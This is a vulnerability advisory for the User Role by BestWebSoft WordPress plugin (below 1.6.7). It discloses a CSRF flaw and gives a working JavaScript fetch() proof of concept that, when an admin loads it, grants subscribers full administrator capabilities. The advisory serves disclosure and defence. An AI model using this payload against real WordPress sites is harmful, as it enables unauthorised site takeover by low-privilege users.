WordPress Plugin Vulnerabilities
User Role by BestWebSoft < 1.6.7 - Privilege Escalation via CSRF
Description
The plugin does not protect against CSRF in requests to update role capabilities, leading to arbitrary privilege escalation of any role.
Proof of Concept
Make a logged in admin open a page with the code below. Then, log in as a subscriber and see that you have full admin access. ``` fetch("/wp-admin/admin.php?page=srrl_add_new_roles", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "method": "POST", "body": "srrl_action=update&srrl_role_name=Subscriber&srrl_role_slug=subscriber&srrl_role_caps%5B%5D=activate_plugins&srrl_role_caps%5B%5D=delete_plugins&srrl_role_caps%5B%5D=edit_plugins&srrl_role_caps%5B%5D=install_plugins&srrl_role_caps%5B%5D=update_plugins&srrl_role_caps%5B%5D=delete_themes&srrl_role_caps%5B%5D=edit_theme_options&srrl_role_caps%5B%5D=edit_themes&srrl_role_caps%5B%5D=install_themes&srrl_role_caps%5B%5D=switch_themes&srrl_role_caps%5B%5D=update_themes&srrl_role_caps%5B%5D=add_users&srrl_role_caps%5B%5D=create_users&srrl_role_caps%5B%5D=delete_users&srrl_role_caps%5B%5D=edit_users&srrl_role_caps%5B%5D=list_users&srrl_role_caps%5B%5D=promote_users&srrl_role_caps%5B%5D=remove_users&srrl_role_caps%5B%5D=delete_others_pages&srrl_role_caps%5B%5D=delete_pages&srrl_role_caps%5B%5D=delete_private_pages&srrl_role_caps%5B%5D=delete_published_pages&srrl_role_caps%5B%5D=edit_others_pages&srrl_role_caps%5B%5D=edit_pages&srrl_role_caps%5B%5D=edit_private_pages&srrl_role_caps%5B%5D=edit_published_pages&srrl_role_caps%5B%5D=publish_pages&srrl_role_caps%5B%5D=read_private_pages&srrl_role_caps%5B%5D=delete_others_posts&srrl_role_caps%5B%5D=delete_posts&srrl_role_caps%5B%5D=delete_private_posts&srrl_role_caps%5B%5D=delete_published_posts&srrl_role_caps%5B%5D=edit_others_posts&srrl_role_caps%5B%5D=edit_posts&srrl_role_caps%5B%5D=edit_private_posts&srrl_role_caps%5B%5D=edit_published_posts&srrl_role_caps%5B%5D=publish_posts&srrl_role_caps%5B%5D=read_private_posts&srrl_role_caps%5B%5D=edit_dashboard&srrl_role_caps%5B%5D=edit_files&srrl_role_caps%5B%5D=export&srrl_role_caps%5B%5D=import&srrl_role_caps%5B%5D=manage_categories&srrl_role_caps%5B%5D=manage_links&srrl_role_caps%5B%5D=manage_options&srrl_role_caps%5B%5D=moderate_comments&srrl_role_caps%5B%5D=read&srrl_role_caps%5B%5D=unfiltered_html&srrl_role_caps%5B%5D=unfiltered_upload&srrl_role_caps%5B%5D=update_core&srrl_role_caps%5B%5D=upload_files&srrl_save=1", "credentials": "include" }).then(response => response.text()) .then(data => console.log(data)); ```
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-03-13 (about 1 years ago)
Added
2023-03-13 (about 1 years ago)
Last Updated
2023-03-13 (about 1 years ago)